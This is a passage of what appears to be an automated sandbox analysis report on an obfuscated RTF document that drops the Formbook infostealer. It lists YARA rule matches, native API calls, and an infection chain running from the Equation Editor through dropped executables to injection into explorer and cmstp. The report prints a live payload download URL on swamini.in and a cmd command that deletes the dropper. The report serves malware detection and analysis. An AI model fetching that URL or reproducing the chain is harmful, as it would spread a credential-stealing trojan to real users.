          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: twbcaze.exe PID: 3164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: twbcaze.exe PID: 3172, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmstp.exe PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030FB
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: String function: 0084DF5C appears 137 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: String function: 008BF970 appears 84 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: String function: 0089373B appears 253 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: String function: 0040F880 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: String function: 00893F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: String function: 0084E2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01ECDF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F3F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01ECE2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F1373B appears 253 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F13F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A320 NtCreateFile,7_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A3D0 NtReadFile,7_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A450 NtClose,7_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A500 NtAllocateVirtualMemory,7_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A3CA NtReadFile,7_2_0041A3CA
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0041A44A NtClose,7_2_0041A44A
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008400C4 NtCreateFile,LdrInitializeThunk,7_2_008400C4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00840048
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00840078 NtResumeThread,LdrInitializeThunk,7_2_00840078
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F9F0 NtClose,LdrInitializeThunk,7_2_0083F9F0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F900 NtReadFile,LdrInitializeThunk,7_2_0083F900
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0083FAD0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0083FAE8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0083FBB8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0083FB68
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_0083FC90
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0083FC60
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FD8C NtDelayExecution,LdrInitializeThunk,7_2_0083FD8C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0083FDC0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_0083FEA0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0083FED0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FFB4 NtCreateSection,LdrInitializeThunk,7_2_0083FFB4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00840060 NtQuerySection,7_2_00840060
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008401D4 NtSetValueKey,7_2_008401D4
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0084010C NtOpenDirectoryObject,7_2_0084010C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008407AC NtCreateMutant,7_2_008407AC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00840C40 NtGetContextThread,7_2_00840C40
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_008410D0 NtOpenProcessToken,7_2_008410D0
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00841148 NtOpenThread,7_2_00841148
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F8CC NtWaitForSingleObject,7_2_0083F8CC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00841930 NtSetContextThread,7_2_00841930
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083F938 NtWriteFile,7_2_0083F938
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FAB8 NtQueryValueKey,7_2_0083FAB8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FA20 NtQueryInformationFile,7_2_0083FA20
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FA50 NtEnumerateValueKey,7_2_0083FA50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FBE8 NtQueryVirtualMemory,7_2_0083FBE8
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FB50 NtCreateKey,7_2_0083FB50
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC30 NtOpenProcess,7_2_0083FC30
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FC48 NtSetInformationFile,7_2_0083FC48
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_00841D80 NtSuspendThread,7_2_00841D80
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FD5C NtEnumerateKey,7_2_0083FD5C
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FE24 NtWriteVirtualMemory,7_2_0083FE24
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FFFC NtCreateProcessEx,7_2_0083FFFC
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 7_2_0083FF34 NtQueueApcThread,7_2_0083FF34
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA7E12 NtProtectVirtualMemory,8_2_08CA7E12
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA6232 NtCreateFile,8_2_08CA6232
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA7E0A NtProtectVirtualMemory,8_2_08CA7E0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC00C4 NtCreateFile,LdrInitializeThunk,9_2_01EC00C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC07AC NtCreateMutant,LdrInitializeThunk,9_2_01EC07AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF9F0 NtClose,LdrInitializeThunk,9_2_01EBF9F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF900 NtReadFile,LdrInitializeThunk,9_2_01EBF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_01EBFBB8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01EBFB68
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFB50 NtCreateKey,LdrInitializeThunk,9_2_01EBFB50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_01EBFAE8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01EBFAD0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,9_2_01EBFAB8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01EBFDC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,9_2_01EBFD8C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,9_2_01EBFC60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,9_2_01EBFFB4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01EBFED0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC01D4 NtSetValueKey,9_2_01EC01D4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC010C NtOpenDirectoryObject,9_2_01EC010C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0060 NtQuerySection,9_2_01EC0060
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0078 NtResumeThread,9_2_01EC0078
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0048 NtProtectVirtualMemory,9_2_01EC0048
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC0C40 NtGetContextThread,9_2_01EC0C40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC1148 NtOpenThread,9_2_01EC1148
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC10D0 NtOpenProcessToken,9_2_01EC10D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF938 NtWriteFile,9_2_01EBF938
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC1930 NtSetContextThread,9_2_01EC1930
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBF8CC NtWaitForSingleObject,9_2_01EBF8CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFBE8 NtQueryVirtualMemory,9_2_01EBFBE8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFA50 NtEnumerateValueKey,9_2_01EBFA50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFA20 NtQueryInformationFile,9_2_01EBFA20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EC1D80 NtSuspendThread,9_2_01EC1D80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFD5C NtEnumerateKey,9_2_01EBFD5C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC90 NtUnmapViewOfSection,9_2_01EBFC90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC48 NtSetInformationFile,9_2_01EBFC48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFC30 NtOpenProcess,9_2_01EBFC30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFFFC NtCreateProcessEx,9_2_01EBFFFC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFF34 NtQueueApcThread,9_2_01EBFF34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFEA0 NtReadVirtualMemory,9_2_01EBFEA0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_01EBFE24 NtWriteVirtualMemory,9_2_01EBFE24
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA320 NtCreateFile,9_2_000AA320
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA3D0 NtReadFile,9_2_000AA3D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA450 NtClose,9_2_000AA450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA500 NtAllocateVirtualMemory,9_2_000AA500
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA3CA NtReadFile,9_2_000AA3CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 9_2_000AA44A NtClose,9_2_000AA44A
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@429/12@5/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfReversingLabs: Detection: 48%
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtfVirustotal: Detection: 55%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe "C:\Users\user\AppData\Local\Temp\twbcaze.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeProcess created: C:\Users\user\AppData\Local\Temp\twbcaze.exe C:\Users\user\AppData\Local\Temp\twbcaze.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR66FC.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,5_2_00402053
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_00404292
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCommand line argument: tvxyldblemyhw6_2_00401000
          Source: EQNEDT32.EXEString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: tps://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXEString found in binary or memory: T /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1
          Source: EQNEDT32.EXEString found in binary or memory: tp://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: twbcaze.exe, twbcaze.exe, 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353742446.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353487923.0000000000430000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363230284.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000009.00000003.363443838.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000002030000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.363187187.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: twbcaze.exe, 00000007.00000002.363156888.00000000002A0000.00000040.10000000.00040000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363191563.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879251773.00000000000D0000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeUnpacked PE file: 7.2.twbcaze.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.00cfg:R;.tls:W;.voltbl:R; vs .text:ER;
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A6D32 push ecx; ret 2_2_002A6D33
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00294236 push es; retf 2_2_00294237
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00294F08 pushad ; retf 002Ah2_2_00294F09
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A4562 push es; retf 2_2_002A4563
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A5865 push FFFFFFB1h; ret 2_2_002A5867
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00290142 push es; iretd 2_2_00290169
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00294EE8 pushad ; retf 002Ah2_2_00294EE9
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A67EE push esp; ret 2_2_002A67EF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A67E6 push esp; ret 2_2_002A67E7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A82E6 push ebp; ret 2_2_002A82E7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A84F8 push ebp; ret 2_2_002A84FB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002901F4 push eax; retf 2_2_002901F5
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A7CC8 push esp; ret 2_2_002A7CCB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A75C9 push esp; ret 2_2_002A75CB
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A7CD0 push esp; ret 2_2_002A7CD3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A82D4 push ebp; ret 2_2_002A82DF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029A5D6 push es; retf 2_2_0029A5D7
          Source: C:\Users\user\AppData\Local\Temp\twbcaze.exeCode function: 6_2_0040FA51 push ecx; ret 6_2_0040FA64
